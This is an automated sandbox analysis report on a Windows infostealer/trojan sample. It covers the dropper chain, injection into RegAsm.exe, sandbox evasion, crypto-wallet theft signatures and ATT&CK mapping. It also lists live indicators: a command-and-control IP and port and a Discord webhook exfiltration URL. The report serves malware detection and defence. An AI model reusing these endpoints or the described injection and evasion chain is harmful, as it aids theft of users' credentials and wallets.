Source: Yara match | File source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR

MITRE ATT&CK Matrix

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 131 Windows Management Instrumentation; 1 Native API; 1 Command and Scripting Interpreter; 1 Scheduled Task/Job; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 DLL Side-Loading; 212 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 11 Obfuscated Files or Information; 1 DLL Side-Loading; 111 Masquerading; 151 Virtualization/Sandbox Evasion; 212 Process Injection
Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 3 File and Directory Discovery; 26 System Information Discovery; 1 Query Registry; 241 Security Software Discovery; 3 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 1 Data from Local System; 11 Input Capture; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
Behavior Graph ID: 1573646 | Sample: OR8Ti8rf8h.exe | Start date: 12/12/2024 | Architecture: WINDOWS | Score: 100

Network: iLAKhXCSlkKKBvjaNGAojhxfYe.iLAKhXCSlkKKBvjaNGAojhxfYe; time.windows.com; 5 other IPs or domains
Signatures on the sample: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures

Process tree:
OR8Ti8rf8h.exe (59) started
    dropped: C:\Users\user\AppData\Local\Temp\Wallpapers (data); C:\Users\user\AppData\Local\Temp\Viruses (data); C:\Users\user\AppData\Local\Temp\Usc (data); 34 other malicious files
    signatures: Writes many files with high entropy
    cmd.exe (3) started
        dropped: C:\Users\user\AppData\...\Depression.com (PE32)
        signatures: Drops PE files with a suspicious file extension; Writes many files with high entropy
        Depression.com (1) started
            dropped: C:\Users\user\AppData\Local\...\RegAsm.exe (PE32)
            signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
            RegAsm.exe (1 3) started
                network: 208.115.220.58, 4449, 49843 LIMESTONENETWORKSUS United States
                dropped: C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506 (Microsoft)
                signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Found many strings related to Crypto-Wallets (likely being stolen); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes many files with high entropy
        cmd.exe (2) started
            dropped: C:\Users\user\AppData\Local\Temp\585711\Y (data)
        conhost.exe started
        7 other processes started

Source | Detection | Scanner | Label
OR8Ti8rf8h.exe | 21% | ReversingLabs |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\585711\Depression.com | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe | 0% | ReversingLabs |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.newtonsoft.com/jsonschema | 0% | Avira URL Cloud | safe
http://ocsp.sectigo.com0D | 0% | Avira URL Cloud | safe
http://www.softland.ro0/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 217.20.58.100 | true | false | | high
time.windows.com | unknown | unknown | false | | high
iLAKhXCSlkKKBvjaNGAojhxfYe.iLAKhXCSlkKKBvjaNGAojhxfYe | unknown | unknown | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | OR8Ti8rf8h.exe | false | | high
https://sectigo.com/CPS0 | OR8Ti8rf8h.exe | false | | high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0# | OR8Ti8rf8h.exe | false | | high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | OR8Ti8rf8h.exe | false | | high
http://ocsp.sectigo.com0 | OR8Ti8rf8h.exe | false | | high
http://www.softland.ro0/ | OR8Ti8rf8h.exe | false | Avira URL Cloud: safe | unknown
https://discordapp.com/api/v6/users/ | RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | OR8Ti8rf8h.exe | false | | high
http://www.autoitscript.com/autoit3/X | Depression.com, 0000000B.00000000.1425868665.00000000010D5000.00000002.00000001.01000000.00000007.sdmp, Managed.0.dr, Depression.com.2.dr | false | | high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | OR8Ti8rf8h.exe | false | | high
http://nsis.sf.net/NSIS_ErrorError | OR8Ti8rf8h.exe | false | | high
https://www.autoitscript.com/autoit3/ | Depression.com.2.dr, Ada.0.dr | false | | high
https://urn.to/r/sds_seeaCould | RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://james.newtonking.com/projects/json | RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://www.newtonsoft.com/jsonschema | RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0 | OR8Ti8rf8h.exe | false | | high
https://stackoverflow.com/q/14436606/23354cIt | RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://ipinfo.io/ip | RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://github.com/LimerBoy/StormKitty | RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/11564914/23354; | RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://stackoverflow.com/q/2152978/23354 | RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z | OR8Ti8rf8h.exe | false | | high
https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5 | RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://urn.to/r/sds_see | RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RegAsm.exe, 0000000E.00000002.2630405640.0000000003421000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0# | OR8Ti8rf8h.exe | false | | high
http://ocsp.sectigo.com0D | OR8Ti8rf8h.exe | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.115.220.58 | unknown | United States | 46475 | LIMESTONENETWORKSUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1573646
Start date and time: 2024-12-12 12:37:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: OR8Ti8rf8h.exe (renamed because the original name is a hash value)
Original Sample Name: af9cd831104a7d0a352cd88f77a4cfbdde43804b5225002fc7115685d2c6297f.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.evad.winEXE@24/54@2/1
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 74
                                                                              • Number of non-executed functions: 41
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 40.81.94.65, 217.20.58.100, 13.107.246.63, 4.245.163.56
                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, twc.trafficmanager.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                              • VT rate limit hit for: OR8Ti8rf8h.exe
Time | Type | Description
06:38:12 | API Interceptor | 1x Sleep call for process: OR8Ti8rf8h.exe modified
06:38:55 | API Interceptor | 9x Sleep call for process: Depression.com modified
06:39:18 | API Interceptor | 17x Sleep call for process: RegAsm.exe modified
                                                                              No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
s-part-0035.t-0009.t-msedge.net | https://www.google.cv/url?duf=FbLLcAJXWZoeUZJIjST2&lfg=uVQGQao2QJuMH6TEkmpq&sa=t&fmc=XCKeeJBBTaVsgNFTQcDe&url=amp%2Fshairmylife.com%2Fkam%2FOATWMWQPC27P047EIPR32X/YWxpc29ub0B0aG9ydWsuY29t | Get hash | malicious | Unknown | Browse | 13.107.246.63
 | setup (2).msi | Get hash | malicious | Unknown | Browse | 13.107.246.63
 | DocScan_20242175.js | Get hash | malicious | Unknown | Browse | 13.107.246.63
 | setup.msi | Get hash | malicious | Unknown | Browse | 13.107.246.63
 | Non_disclosure_agreement.lnk.download.lnk | Get hash | malicious | Unknown | Browse | 13.107.246.63
 | Rockwool-Msg-S9039587897.pdf | Get hash | malicious | EvilProxy, HTMLPhisher | Browse | 13.107.246.63
 | http://get-derila.com | Get hash | malicious | Unknown | Browse | 13.107.246.63
 | Event Schedule.xlsx | Get hash | malicious | Unknown | Browse | 13.107.246.63
 | DHL AWB Document_pdf.vbs | Get hash | malicious | Unknown | Browse | 13.107.246.63
 | malware.ps1 | Get hash | malicious | Unknown | Browse | 13.107.246.63
bg.microsoft.map.fastly.net | HvASs4SYK9.exe | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | Rockwool-Msg-S9039587897.pdf | Get hash | malicious | EvilProxy, HTMLPhisher | Browse | 199.232.210.172
 | financial_policy_December 10, 2024.pdf | Get hash | malicious | KnowBe4, PDFPhish | Browse | 199.232.214.172
 | RQ--029.msi | Get hash | malicious | AteraAgent | Browse | 199.232.210.172
 | DHL AWB Document_pdf.vbs | Get hash | malicious | Unknown | Browse | 199.232.214.172
 | Purchase_order-001.pdf | Get hash | malicious | Unknown | Browse | 199.232.210.172
 | Request for Quotations and specifications.pdf.exe | Get hash | malicious | MassLogger RAT | Browse | 199.232.210.172
 | MHDeXPq2uB.exe | Get hash | malicious | RedLine | Browse | 199.232.210.172
 | n70CrSGL8G.exe | Get hash | malicious | RedLine | Browse | 199.232.214.172
 | 1.e | Get hash | malicious | DanaBot | Browse | 199.232.210.172
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | Event Schedule.xlsx | Get hash | malicious | Unknown | Browse | 217.20.58.100
 | Request for Quotations and specifications.pdf.exe | Get hash | malicious | MassLogger RAT | Browse | 217.20.58.98
 | Tyler_In service Agreement889889.pdf | Get hash | malicious | Unknown | Browse | 217.20.58.101
 | https://download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop/Documents/Instruction_695-18014-012_Rev.PDF.lnk | Get hash | malicious | Unknown | Browse | 84.201.211.22
 | Employee_Letter.pdf | Get hash | malicious | HTMLPhisher | Browse | 217.20.58.99
 | Carisls Open Benefits Enrollment.eml | Get hash | malicious | unknown | Browse | 217.20.58.101
 | Ou1b9NGTq8.dll | Get hash | malicious | Unknown | Browse | 217.20.58.98
 | CID5B21A97B8635.pdf | Get hash | malicious | Captcha Phish | Browse | 217.20.58.101
 | FG Or#U00e7amento JAN 2025.pdf | Get hash | malicious | Unknown | Browse | 217.20.58.98
 | Stonhard Response Required 10 Dec, 2024- 0PH8-NYFV0C-ZDU7.msg | Get hash | malicious | Unknown | Browse | 217.20.57.24
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
LIMESTONENETWORKSUS | hax.spc.elf | Get hash | malicious | Mirai | Browse | 192.169.92.229
 | DHL_734825510.exe | Get hash | malicious | FormBook | Browse | 208.115.225.220
 | SW_5724.exe | Get hash | malicious | FormBook | Browse | 208.115.225.220
 | Banco Santander Totta _Aconselhamento_Pagamento.img | Get hash | malicious | Remcos | Browse | 64.31.43.234
 | Qp4Oxj7MFr.exe | Get hash | malicious | Unknown | Browse | 64.31.43.234
 | eL4Cy6oGvv.exe | Get hash | malicious | Unknown | Browse | 64.31.43.234
 | Qp4Oxj7MFr.exe | Get hash | malicious | Unknown | Browse | 64.31.43.234
 | eL4Cy6oGvv.exe | Get hash | malicious | Unknown | Browse | 64.31.43.234
 | kVwZX19J2X.exe | Get hash | malicious | Unknown | Browse | 64.31.43.234
 | kVwZX19J2X.exe | Get hash | malicious | Unknown | Browse | 64.31.43.234
                                                                              No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\585711\Depression.com | nanophanotool.exe | Get hash | malicious | LummaC Stealer | Browse |
 | 5y2VCFOB05.exe | Get hash | malicious | RHADAMANTHYS | Browse |
 | 5y2VCFOB05.exe | Get hash | malicious | RHADAMANTHYS | Browse |
 | PQwHxAiBGt.exe | Get hash | malicious | RHADAMANTHYS | Browse |
 | file.exe | Get hash | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | Browse |
 | file.exe | Get hash | malicious | Unknown | Browse |
 | SeT_up.exe | Get hash | malicious | LummaC Stealer | Browse |
 | Setup.exe | Get hash | malicious | LummaC | Browse |
                                                                                              Process:C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe
                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):71954
                                                                                              Entropy (8bit):7.996617769952133
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                              Malicious:true
                                                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                              Process:C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):328
                                                                                              Entropy (8bit):3.1363752421440023
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:kKEvR/L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:eRaDnLNkPlE99SNxAhUe/3
                                                                                              MD5:5CAB80CD96CCACA461B0DFABE01D5812
                                                                                              SHA1:22D0121515ACCF5510AE73B763433A671342537E
                                                                                              SHA-256:3FAFE95E9597B535F371DB2CE2401118A6516842C415BEA116CC68FB67FDAF31
                                                                                              SHA-512:FBEF4A94C8FD794D928C011349A0942E8E0364953B881E3ED4136198935B56B9C395223688E3BCC45A49E1B2D7EFDA42C09F647D09934F4F2245D3D65268CAC2
                                                                                              Malicious:false
                                                                                              Preview:p...... ........d.kz.L..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:modified
                                                                                              Size (bytes):947288
                                                                                              Entropy (8bit):6.630612696399572
                                                                                              Encrypted:false
                                                                                              SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                              MD5:62D09F076E6E0240548C2F837536A46A
                                                                                              SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                              SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                              SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Joe Sandbox View:
                                                                                              • Filename: nanophanotool.exe, Detection: malicious, Browse
                                                                                              • Filename: 5y2VCFOB05.exe, Detection: malicious, Browse
                                                                                              • Filename: 5y2VCFOB05.exe, Detection: malicious, Browse
                                                                                              • Filename: PQwHxAiBGt.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                              • Filename: SeT_up.exe, Detection: malicious, Browse
                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\AppData\Local\Temp\585711\Depression.com
                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):65440
                                                                                              Entropy (8bit):6.049806962480652
                                                                                              Encrypted:false
                                                                                              SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                                              MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                                              SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                                              SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                                              SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):2758195
                                                                                              Entropy (8bit):7.999930924074638
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:PFa4PNJ9sfYo7nk/o8jyKBghOhOQ7bwWlVrAHGfcG8VaQt+bs/2OdW+d6zf:Q4P39sfzk/hjyKB7ltLcGCaM6Kzknzf
                                                                                              MD5:EEABFF90A4763BC188583D4F52D3ED3E
                                                                                              SHA1:16DAD570BE93045223E3FE2D3DCCD1EF08651175
                                                                                              SHA-256:D5D9183DF170FCC23D6A64F55034C61B37EB714AF1A1C026D83E1F46B1F4888E
                                                                                              SHA-512:0361288B7D31410AC1FF2844E8416FE3F3EC0CA2B1455BCFEFF7479662404285898E25CFF47472CB9EF007F2E339A4268A0C2D755456193C8F63C9D48000EBCD
                                                                                              Malicious:true
                                                                                              Preview:}Z.*..-..IR(.h.._e.a.iZ.j.....WV.......F..Y.+.*V.N.....+}4:o...1....%.x.......>..P.zE.....j'..'#Z..1...i..M*.........#7.z...=._..j.....{..(......Y..pm6..9..+.X.Q....#.;...#........i...#i............v.4.1...E..}....e.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rq...F.O.'.F...h..............K..7....K..7...kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..w.!..,P..Myn.2..t.W.....*...n..IB.K......K..7...m.....I.....5...x..2).U.j....2>..#.~.\.HE......i_.H...U>D.s.,t..?.....=.a....:'...&F,]._..dWx-.d...[f..&g..!....B ....e..6..r8}*7..2s.7~s...>~.YH.m....x)e9.L..D'q...`.I.X.@9..n..C..52nB..wt..^*@.Z....'.8..Q.r9...M.+7.....{uY..Pf........3..XI-Xop..,t..=.EW..D.o1S..T*......3....n.e.Q
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):85134
                                                                                              Entropy (8bit):6.941319396723298
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:OWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:OWy4ZNoGmROL7F1G7ho2kOb
                                                                                              MD5:C25664A12AFDEF03C7D5DA57FCD2FB10
                                                                                              SHA1:BC201D2D58E50C0B1DEBC2A4CEFC159EFF3155DA
                                                                                              SHA-256:9BCCC2D6A92BAC346880C9EEDEED737728F4964C6187FE562B2F3A260CC3A5E5
                                                                                              SHA-512:E09805621377893EBB4B6D7F9E9C21ADAA554DCFD042AC9A3C858B3E20E1D1D92AD3DBD7EF84F059D78D3BD8DEB4678FDC25C526238F79445713D343F82E61A4
                                                                                              Malicious:false
                                                                                              Preview:t.c.o.d.e. .(.r.e.s.e.r.v.e.d. .f.o.r. .A.u.t.o.I.t. .i.n.t.e.r.n.a.l. .u.s.e.)...+.V.a.r.i.a.b.l.e. .c.a.n.n.o.t. .b.e. .a.c.c.e.s.s.e.d. .i.n. .t.h.i.s. .m.a.n.n.e.r.....F.u.n.c. .r.e.a.s.s.i.g.n. .n.o.t. .a.l.l.o.w.e.d...*.F.u.n.c. .r.e.a.s.s.i.g.n. .o.n. .g.l.o.b.a.l. .l.e.v.e.l. .n.o.t. .a.l.l.o.w.e.d...........(...0...`.........................................................................................................................................................................................................."".!...............!!.#3S33"!.!! ............$3W3SCS"!..............&#C3W6#bbB!!.........!!$36$$2S433b2.........!..$$5sc63bSC3S!..........3bc353S336%bbb!.........C353C$4543333S!........#53Cb6&"Cb5bCb3R.. .....3bc#53C633C353c6.!......535c6$$3562Cc53S1......%6$33S3bE6%6%56$32.....!#34443b3333333336"....!.63...$".....!!.!S6......3T"..#R.......!.3S!! ...S2B...3!.....!.#631.....6&".!.$1!...!.!53SQ!!...336"...3""R1.!.3b31.....5cW2...53c3!!.#S461!!..$333S!.!#b3S...36#52....
                                                                                              Process:C:\Users\user\Desktop\OR8Ti8rf8h.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):90112
                                                                                              Entropy (8bit):7.997828968222553
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:4gQuTNPDyf2qGfjOJlUkhvIhABjyZ/utqBTIPetzRMEsIOZ4MP6fJ:4mNPO+3fylhvIhAB8getzy9gfJ
                                                                                              MD5:6647B0C3D61384A8F00E6C92AE0DB1BE
                                                                                              SHA1:FF8C8CB6656843C05E544806D886C82AFB6B50AE
                                                                                              SHA-256:F609264D4479B118D6216450E47D17D560829CB6AABC7A4FE7CA349439D4EA43
                                                                                              SHA-512:316081F233E8F6D45C9B3A941A16496A901A022987AEE5DA98377306A1E3E8235C452C235139B7DFB4FDC62CE378987C76E5C34D2A447CB22D12F1C152BE3781
                                                                                              Malicious:true
